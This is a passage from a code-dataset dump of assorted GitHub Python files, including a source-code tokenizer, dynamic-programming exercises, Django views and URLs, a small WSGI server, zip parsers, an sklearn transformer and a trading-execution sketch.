for token in tokens:\n if token.line > current_row:\n current_row = token.line\n rows.append([])\n rows[-1].append(token.token_value)\n\n row_strs = [' '.join(row) for row in rows]\n return row_strs\n\n\ndef fix_join_artifacts(text: str):\n # remove spaces between dots\n text = re.sub(r'\\s?\\.\\s?(?=\\w+)', '.', text)\n # remove spaces between underscores\n text = re.sub(r'_\\s?(?=\\w+)', '_', text)\n # replace 0X with 0x\n text = re.sub(r'0X', '0x', text)\n return text\n\n\ndef fix_single_quotes(input_str: str):\n # removes all spaces between single quotes to fix char pasing\n return re.sub(r\"\\s+(?=(?:(?:[^']*'){2})*[^']*'[^']*$)\", '', input_str)\n\n\ndef tokens_to_strings(tokens: List[Token]):\n row_joined = _join_by_rows(tokens)\n return ' '.join(fix_single_quotes(fix_join_artifacts(x)) for x in row_joined)\n\n\ndef sanitize_name(name):\n # https://github.com/eliphatfs/torch.redstone\n return re.sub(r'\\W|^(?=\\d)', '_', name)\n\n\ndef _split_name(c_token: str) -> List[str]:\n res = []\n snake_splitted = _try_split_snake(c_token)\n for tok in snake_splitted:\n res.extend(_try_split_camel(tok))\n return res\n\n\ndef _try_split_snake(c_token: str) -> List[str]:\n words = c_token.split('_')\n res = ['_'] * (len(words) * 2 - 1)\n res[0::2] = words\n return res\n\n\ndef _try_split_camel(c_token: str) -> List[str]:\n return re.sub(r'((?<=[a-z])[A-Z]|(? List[str]:\n # remove escape sequences\n stripped = re.sub(r'\\\\.', '', c_token)\n\n # remove enclosing quotes\n if stripped.startswith('\"') or stripped.startswith(\"'\"):\n stripped = stripped[1:]\n if stripped.endswith('\"') or stripped.endswith(\"'\"):\n stripped = stripped[:-1]\n\n return ['\"'] + stripped.strip().split() + ['\"']\n\n\ndef split_identifier(c_token: str) -> List[str]:\n if '/' in c_token: # include path\n res = []\n for subtok in c_token.split('/'):\n res.extend(split_identifier(subtok))\n res.append('/')\n return res\n else:\n return _split_name(c_token)\n\n\nclass JavaScriptTokenizer:\n def __init__(self):\n parser = tree_sitter.Parser()\n parser_lang = tree_sitter.Language('./parser/languages.so', 'javascript')\n parser.set_language(parser_lang)\n self.parser = parser\n\n def collect_tokens(self, root: tree_sitter.Node) -> List[Token]:\n tokens = []\n\n def _collect_token(node: tree_sitter.Node):\n if node.type == 'comment':\n return\n elif node.type in {'number'}:\n tokens.append(\n Token(node.text.decode(), TokenType.CONSTANT, node.start_point[0],\n node.start_point[1]))\n elif node.type in {'string', 'template_string', 'regex'}:\n tokens.append(\n Token(node.text.decode(), TokenType.STRING, node.start_point[0],\n node.start_point[1]))\n elif node.type in {\n 'identifier', 'shorthand_property_identifier',\n 'shorthand_property_identifier_pattern'\n }:\n tokens.append(\n Token(node.text.decode(), TokenType.IDENTIFIER, node.start_point[0],\n node.start_point[1]))\n elif node.child_count == 0:\n tokens.append(\n Token(node.text.decode(), TokenType.KEYWORD, node.start_point[0],\n node.start_point[1]))\n else:\n assert node.child_count > 0\n for ch in node.children:\n _collect_token(ch)\n\n _collect_token(root)\n return tokens\n\n def tokenize(self, code: str) -> List[Token]:\n tree = self.parser.parse(bytes(code, 'utf-8'))\n tokens = self.collect_tokens(tree.root_node)\n return tokens\n\n\nclass CodeTokenizer:\n def __init__(self, lang: str = 'c'):\n self.lang = lang\n if lang in ('c', 'cpp'):\n self.tokenizer = CppTokenizer()\n elif lang == 'java':\n self.tokenizer = JavaTokenizer()\n elif lang == 'javascript':\n self.tokenizer = JavaScriptTokenizer()\n else:\n raise ValueError(f'Unsupported language: {lang}')\n\n def _tokens_postprocess(self, tokens: List[Token]):\n res = []\n for token in tokens:\n if token.token_type == TokenType.COMMENT_SYMBOL:\n # res.append('__comment__')\n # raise RuntimeError('No comment allowed!')\n # warnings.warn('sctokenizer found \"comments\" in the code')\n # NOTE: for some reason sctokenizer may create \"comments\" in the code\n continue\n if token.token_type == TokenType.STRING:\n res.extend(split_string_literal(token.token_value))\n # res.append('__string__')\n elif token.token_type == TokenType.CONSTANT:\n res.append(token.token_value)\n # res.append('__constant__')\n elif token.token_type == TokenType.IDENTIFIER:\n res.extend(split_identifier(token.token_value))\n elif len(token.token_value) > 40:\n # the tokenizer is sometimes buggy\n # skip extremely long 'token's\n res.append('')\n else:\n res.append(token.token_value)\n return res\n\n def get_tokens(self, source: str):\n code_tokens = self.tokenizer.tokenize(source)\n return code_tokens, self._tokens_postprocess(code_tokens)\n\n\nif __name__ == '__main__':\n\n def main(argv):\n \"\"\"Driver mostly for testing purposes.\"\"\"\n for filename in argv[1:]:\n with open(filename, 'r') as f:\n source = f.read()\n if source is None:\n continue\n for token in CodeTokenizer().get_tokens(source):\n print(token)\n\n main(sys.argv)\n","repo_name":"YBRua/SrcMarker","sub_path":"code_tokenizer.py","file_name":"code_tokenizer.py","file_ext":"py","file_size_in_byte":6327,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"18324012323","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @File : file_method.py\n# @Author: Lizi\n# @Date : 2020/10/8\n\nimport sys\ntext = sys.stdin.read()\nwords = text.split()\nwordcount = len(words)\nprint(wordcount)","repo_name":"rage-vampire/Python","sub_path":"lizi_project/file/file_method.py","file_name":"file_method.py","file_ext":"py","file_size_in_byte":205,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"1032899519","text":"\n#top down /memoization\ndef frogJump(arr,index):\n if index==0:\n return 0\n if dp[index]!=-1:\n return dp[index]\n left=frogJump(arr,index-1)+abs(arr[index]-arr[index-1])\n right=float('inf')\n if index>1:\n right=min(frogJump(arr,index-2),right)+abs(arr[index]-arr[index-2])\n dp[index]=min(left,right)\n return dp[index]\n\n\n\narr=[30,10,60,10,60,50]\ndp=[-1]*(len(arr))\nprint(frogJump(arr,5))\nprint(dp)\n\n# bottom up (tabulisation)\n\ndef frogJumpBU(arr,index):\n dp=[0]*len(arr)\n if index==0:\n dp[0]=0\n for i in range(1,len(arr)):\n left=dp[index-1]+abs(arr[index]-arr[index-1])\n right=float('inf')\n if index>1:\n right=dp[index-2]+abs(arr[index]-arr[index-2])\n dp[index]=min(left,right)\n return dp[index]\n\n\narr=[30,10,60,10,60,50]\n\n# print(frogJumpBU(arr,5))\n# print(dp)\n\n\n# def frogJumpK(arr,index,k):\n# if index==0:\n# return 0\n# # if dp[index]!=-1:\n# # return dp[index]\n# for i in range(1,k):\n# if index-k>=0:\n# val=frogJumpK(arr,index-i,k)+abs(arr[index]-arr[index-i])\n# print(val)\n# res=min(res,val)\n# return res\n#\n#\n# arr=[30,10,60,10,60,50]\n#\n# print(frogJumpK(arr,5,2))\n# print(dp)\n#\n","repo_name":"NIDHISH99444/InterviewPrep2022Dec21","sub_path":"recursion/DPStriver/1DDP/2FrogJump.py","file_name":"2FrogJump.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18841385462","text":"from django.urls import path\nfrom .views import RoomView, CreateRoomView, GetRoom, JoinRoom, UsersInRoom, LeaveRoom, UpdateRoomView\n\n#add url pattern for each view\nurlpatterns = [\n path('room', RoomView.as_view()),\n path('create-room', CreateRoomView.as_view()),\n path('get-room', GetRoom.as_view()),\n path('join-room', JoinRoom.as_view()),\n path('user-ir', UsersInRoom.as_view()),\n path('leave', LeaveRoom.as_view()),\n path('update-room', UpdateRoomView.as_view()),\n]\n","repo_name":"DLiSWE/Listening-Room","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28541635692","text":"from tkinter import *\n\ndef change_img():\n path = inputBox.get()\n img = PhotoImage(file = path)\n imageLabel.configure(image = img)\n imageLabel.image = img\n\nwindow = Tk()\n\nphoto = PhotoImage(file = \"C:\\\\Practice-Python\\\\chap05\\\\03-back.gif\")\nimageLabel=Label(window, image=photo)#'label' 속성 'image='을 이용하여 레이블안에 이미지 표시.\nimageLabel.pack()\n\ninputBox=Entry(window)\ninputBox.pack()\n\nbutton = Button(window, text='Submit',command=change_img)\nbutton.pack()\n\nwindow.mainloop()","repo_name":"JunRain2/Practice_Py","sub_path":"chap10/06.py","file_name":"06.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2578621831","text":"# Module: wuase_svr.py / version: 1.5 / build: 20211224\n# Purpose: Retrieve application and system information\n# Harris Georgiou (c) 2021, Email:hgeorgiou@unipi.gr\n\n# use only standard modules for cross-platform portability\nimport configparser, logging, logging.handlers, argparse\nfrom wsgiref.simple_server import make_server\nfrom urllib.parse import parse_qs\nimport os, sys, time\nimport app_info # local module\n\n\nclass AppServices():\n '''Class for automating command-line options, configuration file and logging'''\n\n PARAM_CMD = 'command' # URL key for 'command' parameter\n PARAM_CONTENT = 'content' # URL key for 'content' parameter\n\n CMD_HELLO = 'HELLO' # HELLO: print a hello message (verify connection)\n CMD_ECHO = 'ECHO' # ECHO: print back the 'content' argument\n CMD_VER = 'VER' # VER: return service version\n CMD_QUIT = 'QUIT' # QUIT: shutdown the server\n\n\n def __init__(self, app_name='', app_version='<0.0.0>', app_copyright='', \n app_config=''):\n '''Initialize instance (constructor)'''\n self.app_name = app_name\n self.app_version = app_version\n self.app_copyright = app_copyright\n self.app_config = app_config\n self.ip_allow_list = '' # to be updated after configuration fetching\n self.svr_port = -1 # to be updated after configuration fetching\n self.log_level = '' # to be updated after configuration fetching\n\n\n def get_sys_info(self):\n '''Return system information'''\n return (app_info.get_sys_info())\n\n\n def get_app_info(self):\n '''Return application information'''\n # retrieve application and system info, return as string\n return (app_info.get_app_info( self.app_name, self.app_version, self.app_copyright))\n\n\n def init_opt(self):\n '''Command-line options handler (see 'argparse' for details)'''\n self.cmdopt = argparse.ArgumentParser(description=self.app_name+' core functionality.')\n # options '-h' and '--help' are implemented implicitly\n self.cmdopt.add_argument('--version', action='version', version='%(prog)s '+self.app_version)\n self.cmdopt.add_argument('-v', '--verbose', action='store_true', dest='verbose',\n default=False, help='enable verbose mode, detailed logging is enabled')\n self.cmdopt.add_argument('-q', '--quiet', action='store_true', dest='quiet',\n default=False, help='enable quiet mode, no output is printed')\n self.cmdopt.add_argument('-c', '--config', action='store', dest='cfgfile',\n default=self.app_config, help=('configuration file (default=\\'%s\\')' % self.app_config))\n args = self.cmdopt.parse_args()\n self.opt = vars(args)\n\n\n def init_cfg(self, fname=None):\n '''Configuration file handler'''\n if (fname != None):\n cfg_filename = fname # use the given filename if not null\n else:\n cfg_filename = self.opt['config'] # get from command-line options\n # open configuration file for all application parameters\n self.cfg = configparser.ConfigParser()\n self.cfg.read_file(open(cfg_filename)) # read configuration from file\n\n\n def init_log_timeR(self, fname, loglevel, logwhen, loginterval, logcycle):\n '''Logging handler, time-based rotation (see 'logging' for details)'''\n # initialize logger with time-based rotation\n self.log = logging.getLogger(__name__) # use module name as logger id\n self.log.setLevel(loglevel) # set logging level (from string)\n fh = logging.handlers.TimedRotatingFileHandler(fname, when=logwhen, interval=int(loginterval), backupCount=int(logcycle))\n fmt = logging.Formatter('%(asctime)s; %(levelname)s; %(message)s') # set default logging format\n fh.setLevel(loglevel)\n fh.setFormatter(fmt)\n self.log.addHandler(fh)\n\n\n def init_log_sizeR(self, fname, loglevel, loglimit, logcycle):\n '''Logging handler, size-based rotation (see 'logging' for details)'''\n # initialize logger with size-based rotation\n self.log = logging.getLogger(__name__) # use module name as logger id\n self.log.setLevel(loglevel) # set logging level (from string)\n fh = logging.handlers.RotatingFileHandler(fname, maxBytes=int(loglimit), backupCount=int(logcycle))\n #fh = logging.handlers.TimedRotatingFileHandler(fname, when='m', interval=1, backupCount=3)\n fmt = logging.Formatter('%(asctime)s; %(levelname)s; %(message)s') # set default logging format\n fh.setLevel(loglevel)\n fh.setFormatter(fmt)\n self.log.addHandler(fh)\n\n\n def wsgi_app(self, environ, start_response, exc_info=None):\n '''WSGI loop for handling HTTP requests\n Example call: http://localhost:15387?command=ECHO&content=someone\n '''\n try:\n t0 = time.time_ns() # start timer (optional)\n\n # input: get parameters from http query string\n qs = parse_qs(environ['QUERY_STRING'])\n client_cmd = qs.get(self.PARAM_CMD,['None'])[0]\n client_content = qs.get(self.PARAM_CONTENT,['None'])[0]\n client_ip = environ['REMOTE_ADDR']\n\n # process: based on input data\n client_cmd = client_cmd.upper() # convert command tag to uppercase (optional)\n if client_ip not in self.ip_allow_list:\n print('Client dropped (connecting from: %s)' % client_ip)\n raise Exception # drop client with no message in response\n else: # client IP allowed, handle the request normally\n #time.sleep(1) # do some real work here (testing)\n if (client_cmd == self.CMD_ECHO):\n print('-> Request(1): %s=\\'%s\\' , %s=\\'%s\\'' % (self.PARAM_CMD, client_cmd, self.PARAM_CONTENT, client_content))\n response = client_content\n elif (client_cmd == self.CMD_VER):\n print('-> Request(2): %s=\\'%s\\' , %s=\\'%s\\'' % (self.PARAM_CMD, client_cmd, self.PARAM_CONTENT, client_content))\n response = self.get_app_info()\n elif (client_cmd == self.CMD_HELLO):\n print('-> Request(3): %s=\\'%s\\' , %s=\\'%s\\'' % (self.PARAM_CMD, client_cmd, self.PARAM_CONTENT, client_content))\n response = 'Hello client connecting from: ' + client_ip + '\\n'\n elif (client_cmd == self.CMD_QUIT):\n print('-> Request(4): %s=\\'%s\\' , %s=\\'%s\\'' % (self.PARAM_CMD, client_cmd, self.PARAM_CONTENT, client_content))\n response = 'Server shutdown\\n'\n self.log.critical('Server shutdown (QUIT command)') # log only on QUIT request (not Ctrl+C)\n\n # immediate shutdown without responding to 'quit' request\n # shutdown('QUIT command') # perform all internal cleanup\n # os._exit(0) # force exit Python immediately (WSGI loop catches sys.exit())\n else:\n print('Client dropped (invalid request command)')\n raise Exception # drop client with no message in response\n \n # output: produce result (for valid requests)\n status = '200 OK'\n headers = [('Content-Type','text/plain'),('Content-Length',str(len(response)))] \n start_response(status,headers)\n res = [bytes(response.encode('UTF-8'))]\n\n # report lap timer in console window and return result (http)\n print('-> Request served in ' + str((time.time_ns()-t0)/1e6) + ' msec')\n if (client_cmd == self.CMD_QUIT):\n raise SystemExit # raise 'exit' exception after returning the response\n else:\n return res \n\n except SystemExit: # normal shutdown after responding to 'quit' request\n shutdown('QUIT command') # perform all internal cleanup\n os._exit(0) # force exit Python immediately (WSGI loop catches sys.exit())\n\n except Exception:\n status = '500 Internal Server Error'\n headers = [('Content-Type','text/plain')]\n start_response(status, headers, sys.exc_info())\n return [b'Server Error\\n']\n\n\ndef shutdown( str_reason ):\n '''Cleanup actions before WSGI server shutdown'''\n print('\\nShutting down (%s)...' % str_reason)\n\n\ndef main():\n '''Main WSGI server initialization and service'''\n # fetch application tag and version info\n ver_list = app_info.read_version_json('version.json')\n # initialize application server instance\n app = AppServices(app_name=ver_list[0], app_version=ver_list[1]+' (build: '+ver_list[2]+')', \n app_copyright='Harris Georgiou (c) 2021, Licence: CC-BY-NC-SA/4.0i',\n app_config='cfg/settings.cfg')\n # fetch command-line options\n app.init_opt()\n # print full intro if not in 'help' or 'version' options\n print(app.get_app_info(),'\\n') \n print(app.get_sys_info(),'\\n') \n\n # fetch full configuration\n app.init_cfg(app.opt['cfgfile']) # static argument (app-specific), everything else is in there\n print('configuration: ', app.opt['cfgfile'])\n\n # initialize logging\n if (app.opt['verbose'] and not app.opt['quiet']): # only 'verbose' given\n app.log_level = 'DEBUG'\n elif (not app.opt['verbose'] and app.opt['quiet']): # only 'quiet' given\n app.log_level = 'CRITICAL'\n else: # ignore if both 'verbose' and 'quiet' are used\n app.log_level = app.cfg['logging']['level']\n # size-based rotation:\n app.init_log_sizeR(app.cfg['logging']['filename'], app.log_level, app.cfg['logging']['maxBytes'], app.cfg['logging']['backupCount'])\n # time-based rotation:\n #app.init_log_timeR(app.cfg['logging']['filename'], app.cfg['logging']['level'], app.cfg['logging']['when'], app.cfg['logging']['interval'], app.cfg['logging']['backupCount'])\n print('logging file: %s (level=%s)' % (app.cfg['logging']['filename'], app.log_level))\n #print('logging level: ', app.log.getEffectiveLevel())\n\n #print('\\ntype(ip_allow) = ',type(app.cfg['network']['ip_allow']))\n #print('len(ip_allow) = ',len(app.cfg['network']['ip_allow']))\n #print('ip_allow = ',app.cfg['network']['ip_allow'])\n #ip_allow_list = app.cfg['network']['ip_allow'].strip('][').split(',')\n app.ip_allow_list = app.cfg['network']['ip_allow'].replace(' ','').strip('][').split(',')\n #print('\\ntype(ip_allow_list) = ',type(ip_allow_list))\n #print('len(ip_allow_list) = ',len(ip_allow_list))\n print('IP allowed list: ',app.ip_allow_list)\n app.svr_port = int(app.cfg['network']['svr_port'])\n print('Server listening at port %d\\n' % app.svr_port)\n app.log.debug('Server initialized, listening port %d' % app.svr_port)\n\n # Main WSGI server loop\n try:\n httpd = make_server('localhost', app.svr_port, app.wsgi_app)\n print('Serving at port %d...' % app.svr_port)\n httpd.serve_forever()\n except KeyboardInterrupt: # User break (Ctrl+C) in the console\n shutdown('KeyboardInterrupt')\n\n\nif __name__ == '__main__': \n main() # stub for calling the main loop\n","repo_name":"xgeorgio/dev","sub_path":"microsvr-base/micro_svr.py","file_name":"micro_svr.py","file_ext":"py","file_size_in_byte":11544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70342703849","text":"import traceback\nfrom io import BytesIO\nfrom typing import Generator\nfrom zipfile import ZipFile, BadZipFile\n\nclass TimeoutError(Exception):\n def __init__(self, value):\n self.value = value\n\ndef _handle_timeout(signum, frame):\n raise TimeoutError('[*] Request timed out')\n\ndef unzip_request_content(content: [str, bytes]) -> [ZipFile, None]:\n if not content:\n return\n\n try:\n unzipped_file = ZipFile(BytesIO(content))\n return unzipped_file\n except BadZipFile:\n traceback.print_exc(limit=1)\n\ndef parse_row(unzipped_file: ZipFile) -> [str, None]:\n if not unzipped_file:\n return\n\n for file in unzipped_file.namelist():\n for row in unzipped_file.open(file).readlines():\n yield row.decode()\n\ndef parse_url(raw_url: [str, Generator[str, int, bytes]]) -> [str, None]:\n if not raw_url:\n return\n\n try:\n if not isinstance(raw_url, str):\n raw_url = next(raw_url)\n\n row, url = raw_url.split(',')\n return url.replace('\\n', '')\n except (UnicodeDecodeError, ValueError):\n traceback.print_exc(limit=1)","repo_name":"Leovilhena/pbjs-evaluator","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25556714915","text":"import numpy as np\n\nA=(61,41,59,26,41,58)\nA=np.asarray(A)\nprint(A)\nprint(len(A))\n\n#ordena A en forma descendente\n#key=np.zeros((len(A)))\nfor j in range(1,len(A)):\n key=A[j]\n i=j-1\n while (i>=0) and (A[i]>key):\n A[i+1]=A[i]\n i=i-1\n A[i+1]=key\n\nprint('A ordenado descendiente es:',A)\n\n\n\n#ahora vamos a ordenar en forma descendiente\nA=(31,41,59,26,41,58)\nA=np.asarray(A)\nfor j in range(0,len(A)):\n key=A[j]\n i=j-1\n while (i>=0) and (A[i] 3:\r\n self._error = True\r\n self._logger.append(\"Invalid ICD code\")\r\n return\r\n if not re.match('^[a-zA-z]{1}[0-9]{2}(\\.)?(?(1)([0-9]{1,3}|[0-9]{1,3}[a-zA-Z]{1,}))$' , self._icd_value):\r\n self._error = True\r\n self._logger.append(\"Invalid ICD code\")\r\n return\r\n\r\n def get_icd_data(self):\r\n result = get_dump_record(self._icd_value)\r\n if result:\r\n self._result[\"Response\"] = 'True'\r\n self._result[\"Code\"] = self._icd_value\r\n self._result[\"Description\"] = result\r\n self._result[\"Mode\"] = 'dump'\r\n if len(self._icd_value) > 3 and '.' not in self._icd_value:\r\n self._result[\"Code\"] = self._icd_value[:3] + \".\" + self._icd_value[3:]\r\n\r\n def run_dump(self):\r\n self.get_gen_icd()\r\n if not self._error:\r\n self.get_icd_data()\r\n return self._result\r\n\r\n def run_api(self):\r\n if not self._error and self._result.get('Response') == 'False':\r\n self._result = extractapi(self._icd_value)\r\n if self._result.get('Response') == 'True':\r\n self._result = insert_dump_record(self._result)\r\n return self._result\r\n","repo_name":"iparkavan/Health-Care-Project","sub_path":"MedicalFormExtractor/entities_analysis/xml_parse.py","file_name":"xml_parse.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36885356594","text":"import dataclasses\r\n\r\nfrom pointevector.zip import exceptions\r\n\r\nMAGIC = b\"PK\\x06\\x07\"\r\n_STATIC_SIZE_ = 20\r\n\r\n\r\n@dataclasses.dataclass(frozen=True)\r\nclass Zip64EOCDLocator:\r\n zip64_eocd_start_disk: int\r\n zip64_eocd_offset: int\r\n total_disks: int\r\n\r\n @classmethod\r\n def from_memoryview(cls, view: memoryview):\r\n if view.nbytes < _STATIC_SIZE_:\r\n raise exceptions.IncompleteParse()\r\n\r\n if view[:4] != MAGIC:\r\n raise exceptions.BadMagic(view[:4].tobytes())\r\n\r\n return cls(\r\n zip64_eocd_start_disk=int.from_bytes(view[4:8], byteorder=\"little\"),\r\n zip64_eocd_offset=int.from_bytes(view[8:16], byteorder=\"little\"),\r\n total_disks=int.from_bytes(view[16:20], byteorder=\"little\"),\r\n )\r\n\r\n def __len__(self):\r\n return _STATIC_SIZE_\r\n","repo_name":"Pointe-Vector/zip","sub_path":"pointevector/zip/_zip64_eocd_locator.py","file_name":"_zip64_eocd_locator.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24197716091","text":"from django.urls.conf import path\nfrom rest_framework.routers import DefaultRouter\nfrom .views import LenderViewSet, LenderImportAPIView, LenderExportAPIView\n\nurlpatterns = [\n path(\n 'lenders/import/', LenderImportAPIView.as_view(), name='lender-import'\n ),\n path(\n 'lenders/export/', LenderExportAPIView.as_view(), name='lender-export'\n ),\n]\n\nrouter = DefaultRouter()\nrouter.register(r'lenders', LenderViewSet, basename='lender')\nurlpatterns += router.urls\n","repo_name":"saltysealion/finsure-challenge","sub_path":"api_v1/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11828870087","text":"from typing import List\n\nimport pandas as pd\nfrom sklearn.base import BaseEstimator, TransformerMixin\n\n\nclass HighCardinalityDroppper(BaseEstimator, TransformerMixin):\n \"\"\"Drops high cardinality columns.\n\n Attributes:\n - threshold (float): numbers unique categories allowed per column\n expressed as the fraction respect to the number of rows.\n - exclude (list): list of columns which won't pass through this\n estimator.\n \"\"\"\n\n def __init__(self, threshold: float = 0.9, exclude: List = []) -> None:\n self.threshold = threshold\n self.exclude = exclude\n\n def _columns_dropper(self, df: pd.DataFrame) -> None:\n nrows = df.shape[0]\n\n num_uniques = df.nunique().to_frame(name=\"num_uniques\")\n\n missing_vals = num_uniques.assign(\n frac_uniques=num_uniques[\"num_uniques\"] / nrows\n )\n\n missing_vals = missing_vals[\n ~missing_vals.index.isin([\"incident_date\", \"policy_bind_date\"])\n ]\n\n columns_to_drop = missing_vals[\n missing_vals[\"frac_uniques\"] >= self.threshold\n ].index.values.tolist()\n\n self.selected_columns = df.columns.difference(columns_to_drop)\n\n def get_columns(self) -> List[str]:\n \"\"\"Gets the list of remaining columns after the estimator is applied.\n\n Returns:\n List[str]: list of non-dropped columns.\n \"\"\"\n return self.selected_columns.tolist()\n\n def fit(self, X: pd.DataFrame, y=None):\n \"\"\"Fits the values to replace by using 'transform' method.\n Args:\n X (pd.DataFrame): input data\n \"\"\"\n self._columns_dropper(X)\n return self\n\n def transform(self, X: pd.DataFrame, y=None) -> pd.DataFrame:\n \"\"\"Executes the methods to transform each type of column.\n Args:\n X (pd.DataFrame): input dataframe\n Returns:\n pd.DataFrame: Dataframe with imputed values.\n \"\"\"\n return X[self.selected_columns]\n","repo_name":"nelsoncardenas/sklearn-dataframes-practice","sub_path":"column_transformer_TP_talk/src/high_cardinality_dropper.py","file_name":"high_cardinality_dropper.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24085685729","text":"from urllib import response\nfrom django.shortcuts import render, redirect\nfrom django.http import HttpResponse, HttpResponseNotFound, Http404\nfrom django.template.loader import render_to_string\n\n# Create your views here.\n\nmonthly_challenges = {\n \"january\" : \"Work Hard! in january.\",\n \"february\" : \"Work Hard! in february.\",\n \"march\" : \"Your Birthday! Lets celebrate.\",\n \"april\" : \"Work Hard! in april.\",\n \"may\" : \"Work Hard! in may.\",\n \"june\" : \"Work Hard! in june.\",\n \"july\" : \"Work Hard! in july.\",\n \"august\" : \"Work Hard! in august.\",\n \"september\" : \"Work Hard! in september.\",\n \"october\" : \"Work Hard! in october.\",\n \"november\" : \"Work Hard! in november.\",\n \"december\" : None,\n}\n\ndef home(request):\n months = list(monthly_challenges.keys())\n for i in range(len(months)):\n months[i]=months[i].capitalize()\n return render(request, 'challenges/index.html',{\n 'months_list' : months\n })\n\ndef index_num(request,month):\n months = list(monthly_challenges.keys())\n\n if month<=len(months) and month>=1:\n return redirect('index-page', month=months[month-1])\n else:\n response_data = render_to_string('challenges/404.html')\n return HttpResponseNotFound(response_data)\n\ndef index(request,month):\n \n months = list(monthly_challenges.keys())\n if month not in months and month.lower() not in months:\n response_data = render_to_string('challenges/404.html')\n return HttpResponseNotFound(response_data)\n\n challenge_text = monthly_challenges.get(month)\n if challenge_text == None:\n challenge_text = monthly_challenges.get(month.lower())\n\n return render(request, 'challenges/challenge.html', {\n 'month' : month,\n 'text' : challenge_text\n })\n\n\n","repo_name":"SaiAnveshKanchi/Monthly_Challenges","sub_path":"challenges/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24296611314","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('userinfo', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='ToEmail',\n fields=[\n ('id', models.AutoField(serialize=False, auto_created=True, primary_key=True, verbose_name='ID')),\n ('daiorny', models.IntegerField(default=1, choices=[(1, 'daily'), (2, 'harryny')])),\n ('touser', models.ForeignKey(to='userinfo.UserInfo', verbose_name='收件人', related_name='recivea')),\n ('user', models.ForeignKey(to='userinfo.UserInfo', verbose_name='项目经理', related_name='managera')),\n ],\n ),\n ]\n","repo_name":"haominqu/pythoncrm","sub_path":"pythoncrm/sendemail/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35686445164","text":"##Libraries\nimport numpy as np\nimport pandas as pd\nfrom scipy.stats import norm\nimport matplotlib.pyplot as plt\n\n\n##Simulation Engine\nfrom simulation_engine import simulation\n\n\nclass gbm:\n\n ##Constructor function\n def __init__(self, num_shares, algo_params={'window_length':15,'T':375,'T_0':100,'VAR_Q':0.995,'p1':0.01,'p2':0.1,'p3':200}):\n self.T = algo_params['T'] - (2*algo_params['window_length'])\n self.X = num_shares\n self.T_0 = algo_params['T_0']\n self.carry_forward = 0\n self.window_length = algo_params['window_length']\n self.p1 = algo_params['p1']\n self.p2 = algo_params['p2']\n self.p3 = algo_params['p3']\n self.var = algo_params['VAR_Q']\n self.last_x_t = num_shares\n self.last_order = 0\n\n #To estiamte : eta(temp impact), sigma(brownian motion),\n def __estimate_parameters(self, price, high, low, volume):\n ##sigma estimation\n price = [np.log(x) for x in price]\n diff = np.diff(price)\n diff = [i**2 for i in diff]\n sigma = np.sqrt(2*(np.sqrt(np.mean(diff)+1)-1))\n ##eta estimation\n bid_ask_spread = np.mean(high) - np.mean(low)\n avg_volume = np.mean(volume)\n x_t_dot = self.p3*avg_volume\n eta = (bid_ask_spread/(self.p1*avg_volume)) - (bid_ask_spread/(2*x_t_dot))\n return(sigma, eta)\n\n #Lambda hat calculation\n def __calculate_lambda_hat(self, sigma):\n return(1-np.exp((-sigma*np.sqrt(self.T_0)*norm.ppf(self.var))-(pow(sigma,2)*(self.T_0)/2)))\n\n def order(self, price, high, low, volume, t):\n ##updating params\n sigma, eta = self.__estimate_parameters(price, high, low, volume)\n ##calculating lambda and integral\n lamba = self.__calculate_lambda_hat(sigma)/eta\n integral = np.sum(price[self.window_length-1:])\n ##updation\n x_t = max(((self.T-t)/self.T)*((self.X)-((lamba/4)*integral)),0)\n n_t = self.last_x_t - x_t\n if(n_t>=0):\n self.last_x_t = x_t\n n_t = max(n_t,0)\n #volume correction\n final_order = np.floor(n_t+self.carry_forward)\n self.carry_forward = n_t+self.carry_forward - final_order\n ##assertions\n #assert self.carry_forward<=1\n #assert final_order>=0\n #assert final_order == int(final_order)\n ##Return Final result\n self.last_order = final_order\n #print(t, x_t, n_t, final_order)\n return(final_order)\n\n def order_update(self, unrealised):\n self.carry_forward += unrealised\n\ndata = \"../Data/NSE-EOM/ABAN/2018-05-31.csv\"\ndata = pd.read_csv(data)\nsim = simulation(data,dump_data=True)\nmet = gbm(10000)\norder_list = []\nprice_list = []\nfor i in range(15,361):\n high = list(data['High'])[:i]\n low = list(data['Low'])[:i]\n price = list(data['Close'])[:i]\n volume = list(data['Volume'])[:i]\n ord = met.order(price, high, low, volume, 